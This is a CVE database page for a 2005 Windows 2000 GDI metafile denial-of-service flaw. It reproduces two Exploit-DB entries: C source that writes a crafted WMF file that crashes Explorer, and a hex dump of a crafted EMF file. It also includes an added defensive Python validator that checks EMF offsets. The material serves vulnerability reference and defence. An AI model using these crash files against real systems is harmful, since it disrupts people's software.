CVE-2005-0803 : Detail

CVE-2005-0803

86.5% | V4 | Network
Published: 2005-03-20 04h00 +00:00
Last updated: 2018-10-12 17h57 +00:00

CVE Description

The GetEnhMetaFilePaletteEntries API in GDI32.DLL in Windows 2000 allows remote attackers to cause a denial of service (application crash) via a crafted Enhanced Metafile (EMF) file that causes invalid (1) end, (2) emreof, or (3) palent offsets to be used, aka "Enhanced Metafile Vulnerability."

CVE Information

Related Weaknesses

CWE-ID   Weakness Name                          Source
CWE-399  Category: Resource Management Errors
         Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics  Score  Severity  CVSS Vector                  Source
V2       5      -         AV:N/AC:L/Au:N/C:N/I:N/A:P   nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 1346

Publication date : 2005-11-29 23h00 +00:00
Author : Winny Thomas
EDB Verified : Yes

/*
 * Author: Winny Thomas
 * Pune, INDIA
 *
 * The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
 * when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
 * The code was tested on Windows 2000 server SP4. The issue does not occur with the
 * hotfix for GDI (MS05-053) installed.
 *
 * Disclaimer: This code is for educational/testing purposes by authorized persons on
 * networks/systems setup for such a purpose. The author of this code shall not bear
 * any responsibility for any damage caused by using this code.
 *
 */
#include <stdio.h>
#include <string.h>   /* memcpy */

/* 22-byte placeable (Aldus) header followed by the 18-byte standard WMF header */
unsigned char wmfheader[] =
    "\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
    "\x00\x00\x00\x00\x66\xa6"
    "\x01\x00"          // mtType
    "\x09\x00"          // mtHeaderSize
    "\x00\x03"          // mtVersion
    "\xff\xff\xff\x7f"  // mtSize (overwritten in main with the byte count)
    "\x00\x00"          // mtNoObjects (0x0000 is what triggers the crash)
    "\xff\xff\xff\xff"  // mtMaxRecord (overwritten in main with recordsizeW)
    "\x00\x00";         // mtNoParameters

/* WMF record stream appended after the header */
unsigned char metafileRECORD[] =
    "\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x05\x00\x00\x00\x0c\x02"
    "\x91\xf9\xe4\x06\x04\x00\x00\x00\x06\x01\x01\x00\x07\x00\x00\x00"
    "\xfc\x02\x00\x00\x0e\x0d\x0d\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
    "\x00\x00\x08\x00\x00\x00\xfa\x02"
    "\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01"
    "\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03"
    "\x08\x00\xc6\xfb\xca\x02\xbc\xfe\xca\x02\x0f\x01\x49\x06\xa5\x02"
    "\x49\x06\xf4\x00\x68\x08\xd5\xfc\x65\x06\x86\xfe\x65\x06\xc6\xfb"
    "\xca\x02\x08\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x07\x00\x00\x00\xfc\x02"
    "\x00\x00\xff\xff\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00"
    "\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00"
    "\xbd\x34\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00"
    "\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00"
    "\x00\x00\x24\x03\x05\x00\xd5\xfc\x36\x07\xda\xfc\xd1\x06\x8b\xfe"
    "\xd1\x06\x86\xfe\x36\x07\xd5\xfc\x36\x07\x04\x00\x00\x00\x2d\x01"
    "\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01"
    "\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34\x30\x00\x00\x00"
    "\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00"
    "\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00"
    "\xc6\xfb\x9b\x03\xcb\xfb\x36\x03\xc1\xfe\x36\x03\xbc\xfe\x9b\x03"
    "\xc6\xfb\x9b\x03\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00"
    "\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00"
    "\xfc\x02\x00\x00\xfb\x4e\x55\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
    "\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01"
    "\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00\xbc\xfe\x9b\x03\xc1\xfe"
    "\x36\x03\x14\x01\xb5\x06\x0f\x01\x1a\x07\xbc\xfe\x9b\x03\x04\x00"
    "\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
    "\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34"
    "\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00"
    "\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00"
    "\x24\x03\x05\x00\x0f\x01\x1a\x07\x14\x01\xb5\x06\xaa\x02\xb5\x06"
    "\xa5\x02\x1a\x07\x0f\x01\x1a\x07\x04\x00\x00\x00\x2d\x01\x02\x00"
    "\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00"
    "\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00"
    "\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00"
    "\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb"
    "\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00"
    "\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03\x04\x00"
    "\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
    "\x00\x00\xf0\x01\x00\x00\x03\x00";

/* trailing EOF record */
unsigned char wmfeof[] = "\x00\x00\x00\x00";

int main(int argc, char *argv[])
{
    FILE *fp;
    int metafilesizeW, recordsizeW;
    char wmfbuf[2048];
    int metafilesize, recordsize, i, j;

    /* -3 drops the NUL terminator of each of the three string literals */
    metafilesize = sizeof(wmfheader) + sizeof(metafileRECORD) + sizeof(wmfeof) - 3;
    metafilesizeW = metafilesize / 2;        /* size in 16-bit words; computed but not written below */
    recordsize = sizeof(metafileRECORD) - 1;
    recordsizeW = recordsize / 2;

    /* mtSize (offset 28) receives the byte count; mtMaxRecord (offset 34) the record size in words */
    memcpy(&wmfheader[28], &metafilesize, 4);
    memcpy(&wmfheader[34], &recordsizeW, 4);

    printf("[*] Adding Metafile header\n");
    for (i = 0; i < sizeof(wmfheader) - 1; i++) {
        wmfbuf[i] = wmfheader[i];
    }
    printf("[*] Adding metafile records\n");
    for (j = i, i = 0; i < sizeof(metafileRECORD) - 1; i++, j++) {
        wmfbuf[j] = metafileRECORD[i];
    }
    printf("[*] Setting EOF\n");
    for (i = 0; i < sizeof(wmfeof) - 1; i++, j++) {
        wmfbuf[j] = wmfeof[i];
    }
    printf("[*] Creating Metafile (MS053.wmf)\n");
    fp = fopen("MS053.wmf", "wb");
    if (fp == NULL) {
        perror("fopen");
        return 1;
    }
    fwrite(wmfbuf, 1, metafilesize, fp);
    fclose(fp);
    return 0;
}

// milw0rm.com [2005-11-30]
Exploit Database EDB-ID : 25231

Publication date : 2005-03-16 23h00 +00:00
Author : Hongzhen Zhou
EDB Verified : Yes

source: https://www.securityfocus.com/bid/12834/info

Reportedly, a denial of service vulnerability affects Microsoft Windows GDI library 'gdi32.dll'. This issue is due to a failure of the application to securely copy data from malformed EMF image files. An attacker may leverage this issue to trigger a denial of service condition in software implementing the vulnerable library. Other attacks may also be possible.

A hex dumped EMF file:
-------------------------------------------------------
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 00 c2 1a 00 00
0000050 cc 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00
0000060 00 00 00 00 0e 00 00 00 14 00 00 00 41 00 00 00
0000070 41 42 43 44 00 00 01 ff
-------------------------------------------------------
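The hex dump above is the complete 120-byte crafted EMF, and the CVE description names the three offsets that GetEnhMetaFilePaletteEntries trusts: the end of the file (nBytes), the EMR_EOF record located from that end via SizeLast, and the palette entries reached through offPalEntries inside EMR_EOF. The validator below is an added example, not code from the advisory, Microsoft or this CVE record; it transcribes the dump as constructed sample input, parses the documented ENHMETAHEADER and EMR_EOF layouts, and reports which of those offsets fail the bounds checks a safe implementation performs before dereferencing them. Function names and finding labels are this example's own.

```python
"""Bounds checks for the EMF fields that GetEnhMetaFilePaletteEntries relies on.

Added example for this CVE entry (not code from the advisory, Microsoft or the
CVE page). Field layouts follow the documented ENHMETAHEADER and EMR_EOF
structures; helper and finding names are this example's own.
"""
import struct

EMR_HEADER = 1
EMR_EOF = 14
EMF_SIGNATURE = 0x464D4520   # " EMF" read as a little-endian DWORD
ENHMETAHEADER_MIN = 88       # original header size; later versions are larger
EMR_EOF_MIN = 20             # Type, Size, nPalEntries, offPalEntries, SizeLast

# Constructed sample input: the 120 bytes transcribed from the advisory's hex dump.
SAMPLE_EMF = bytes.fromhex(
    "01000000 64000000 93000000 02000000 83010000 39010000 00000000 00000000"
    "d1080000 be060000 20454d46 00000100 78000000 17000000 03000000 0f000000"
    "64000000 41000000 c8120000 c21a0000 cc000000 22010000 00000000 00000000"
    "00000000 0e000000 14000000 41000000 41424344 000001ff"
)


def parse_header(data):
    """Return the ENHMETAHEADER fields the validator needs (all little-endian)."""
    if len(data) < ENHMETAHEADER_MIN:
        raise ValueError("end: file shorter than an ENHMETAHEADER")
    iType, nSize = struct.unpack_from("<II", data, 0)
    (dSignature, nVersion, nBytes, nRecords, nHandles, _reserved,
     nDescription, offDescription, nPalEntries) = struct.unpack_from("<IIIIHHIII", data, 0x28)
    return {"iType": iType, "nSize": nSize, "dSignature": dSignature, "nVersion": nVersion,
            "nBytes": nBytes, "nRecords": nRecords, "nHandles": nHandles,
            "nDescription": nDescription, "offDescription": offDescription,
            "nPalEntries": nPalEntries}


def walk_records(data, start, end):
    """Yield (offset, type, size) for each record; stop at EMR_EOF or a bad size."""
    off = start
    while off + 8 <= end:
        rtype, rsize = struct.unpack_from("<II", data, off)
        if rsize < 8 or rsize % 4 or off + rsize > end:
            raise ValueError("record at 0x%x has invalid size %d" % (off, rsize))
        yield off, rtype, rsize
        if rtype == EMR_EOF:
            return
        off += rsize


def validate_emf(data):
    """Return a list of findings; an empty list means the offsets are consistent."""
    findings = []
    try:
        hdr = parse_header(data)
    except ValueError as exc:
        return [str(exc)]
    if hdr["iType"] != EMR_HEADER or hdr["dSignature"] != EMF_SIGNATURE:
        return ["not an EMF: bad iType or dSignature"]
    # (1) 'end': the header's byte count must match the data actually present
    if hdr["nBytes"] != len(data):
        findings.append("end: nBytes=%d but %d bytes are present" % (hdr["nBytes"], len(data)))
    end = min(hdr["nBytes"], len(data))
    if not ENHMETAHEADER_MIN <= hdr["nSize"] <= end:
        findings.append("end: nSize=%d lies outside the file" % hdr["nSize"])
        return findings
    if hdr["nDescription"] and hdr["offDescription"] + 2 * hdr["nDescription"] > end:
        findings.append("description: offDescription + 2*nDescription = %d exceeds %d bytes"
                        % (hdr["offDescription"] + 2 * hdr["nDescription"], end))
    # (2) 'emreof': walk the record chain forward and require that it ends in EMR_EOF
    records = []
    try:
        records = list(walk_records(data, hdr["nSize"], end))
    except ValueError as exc:
        findings.append("emreof: %s" % exc)
    if not records or records[-1][1] != EMR_EOF:
        findings.append("emreof: no EMR_EOF record reached before the end of the file")
        return findings
    eof_off, _, eof_size = records[-1]
    n_pal, off_pal = struct.unpack_from("<II", data, eof_off + 8)
    # GDI finds EMR_EOF backwards from the end using SizeLast, so it must equal the record size
    size_last = struct.unpack_from("<I", data, end - 4)[0]
    if size_last != eof_size:
        findings.append("emreof: SizeLast=0x%08x does not match the EMR_EOF size %d, so the "
                        "record cannot be located from the end" % (size_last, eof_size))
    # (3) 'palent': palette entries live inside EMR_EOF, after its 16-byte fixed part
    if n_pal and (off_pal < 16 or off_pal + 4 * n_pal > eof_size - 4):
        findings.append("palent: nPalEntries=%d at offPalEntries=0x%x do not fit inside a "
                        "%d-byte EMR_EOF" % (n_pal, off_pal, eof_size))
    if n_pal != hdr["nPalEntries"]:
        findings.append("palent: header nPalEntries=%d but EMR_EOF carries %d" % (hdr["nPalEntries"], n_pal))
    if hdr["nRecords"] != len(records) + 1:
        findings.append("nRecords=%d declared, %d records present" % (hdr["nRecords"], len(records) + 1))
    return findings


def build_minimal_emf():
    """Constructed well-formed 120-byte EMF: a 100-byte header and an empty EMR_EOF."""
    hdr = struct.pack("<II", EMR_HEADER, 100)
    hdr += struct.pack("<4i", 0, 0, 0, 0) + struct.pack("<4i", 0, 0, 0, 0)      # rclBounds, rclFrame
    hdr += struct.pack("<IIIIHHIII", EMF_SIGNATURE, 0x00010000, 120, 2, 1, 0, 0, 0, 0)
    hdr += struct.pack("<4i", 0, 0, 0, 0)                                        # szlDevice, szlMillimeters
    hdr += struct.pack("<III", 0, 0, 0)                                          # cbPixelFormat, offPixelFormat, bOpenGL
    eof = struct.pack("<IIIII", EMR_EOF, EMR_EOF_MIN, 0, 16, EMR_EOF_MIN)
    return hdr + eof


if __name__ == "__main__":
    for line in validate_emf(SAMPLE_EMF):
        print(line)
```

Run against the advisory's file the checks report an unreachable description, a SizeLast that does not point back at EMR_EOF, a palette that cannot fit in a 20-byte record, and a record count that does not match; the constructed minimal file passes cleanly, which is the contract a caller should require before handing the buffer to the palette API.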

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version *


References

http://www.osvdb.org/20580
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/17461
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2005/2348
Tags : vdb-entry, x_refsource_VUPEN
http://www.kb.cert.org/vuls/id/134756
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/14631
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/12834
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1015168
Tags : vdb-entry, x_refsource_SECTRACK
http://www.us-cert.gov/cas/techalerts/TA05-312A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/17223
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=111108743527497&w=2
Tags : mailing-list, x_refsource_BUGTRAQ